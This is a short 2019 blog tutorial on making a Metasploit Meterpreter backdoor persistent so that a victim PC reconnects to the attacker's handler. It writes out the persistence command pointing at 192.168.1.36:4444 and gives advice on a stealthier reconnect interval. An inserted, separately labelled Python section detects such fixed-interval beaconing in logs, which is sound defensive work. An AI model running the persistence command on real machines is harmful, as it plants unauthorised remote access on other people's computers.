Wednesday, December 4, 2019

Metasploit Meterpreter Persistence even when you are not listening on the port | Just like a RAT



I came across an interesting question: can Meterpreter be used as a proper persistent remote administration tool?

When I started exploring, I found that a Meterpreter session can indeed be made persistent, i.e., when the victim PC is disconnected and comes back online, it connects back to your Meterpreter exploit handler.

Let's see how to do this.

Assume you have created the Meterpreter payload (ELF or Windows binary) and started your handler on the port of your choice.




Assume we got the connection back after the Meterpreter binary was executed.




At this point we are going to make the backdoor persistent; otherwise, if the victim turns off the PC, the connection is lost until the victim opens the payload (the "image") again. To avoid this we use a Ruby script called "persistence", written by Carlos Perez. Showing the help:



Seeing this, our command will be:

run persistence -U -i 5 -p 4444 -r 192.168.1.36

That is, every time the victim starts a session (logs in), the backdoor will try to open a connection to 192.168.1.36:4444 every 5 seconds. The interval is the attacker's choice: a longer one, say 5 minutes, is somewhat stealthier, while a short interval makes the reconnect attempts more likely to be detected.
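The fixed reconnect interval described above is also what makes this kind of backdoor visible from the network side. As an added example, not part of the original post or of Metasploit, the Python below reads constructed connection-log lines and flags hosts whose connections to one destination recur at an almost constant interval; the log format, sample data and thresholds are assumptions made for this example.

```python
# Added example: flag fixed-interval reconnects (beaconing) in connection logs.
# Not from the post or Metasploit; the log format, sample data and thresholds
# are assumptions made for this example.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: one host reconnecting to 192.168.1.36:4444 every 5 s,
# plus ordinary, irregular traffic from the same host to a web server.
SAMPLE_LOG = """\
2019-12-04T10:00:00 10.0.0.7 192.168.1.36 4444
2019-12-04T10:00:05 10.0.0.7 192.168.1.36 4444
2019-12-04T10:00:10 10.0.0.7 192.168.1.36 4444
2019-12-04T10:00:15 10.0.0.7 192.168.1.36 4444
2019-12-04T10:00:20 10.0.0.7 192.168.1.36 4444
2019-12-04T10:00:02 10.0.0.7 10.0.0.20 443
2019-12-04T10:00:31 10.0.0.7 10.0.0.20 443
2019-12-04T10:01:07 10.0.0.7 10.0.0.20 443
2019-12-04T10:04:45 10.0.0.7 10.0.0.20 443
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport); one record per line."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def find_beacons(flows, min_connections=4, max_jitter=0.2):
    """Return (flow, mean_gap_s, jitter) for flows whose gaps are nearly constant.

    jitter = stddev(gaps) / mean(gaps): a reconnect loop with a fixed interval
    (e.g. 'persistence -i 5') sits near 0, human-driven traffic does not.
    """
    beacons = []
    for key, times in flows.items():
        if len(times) < min_connections:
            continue
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append((key, round(avg, 1), round(pstdev(gaps) / avg, 3)))
    return beacons
```

Running `find_beacons(parse_log(SAMPLE_LOG))` returns only the 4444 flow, with a 5.0 s mean gap and zero jitter, while the irregular HTTPS traffic is left alone.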



Cheers, use this responsibly
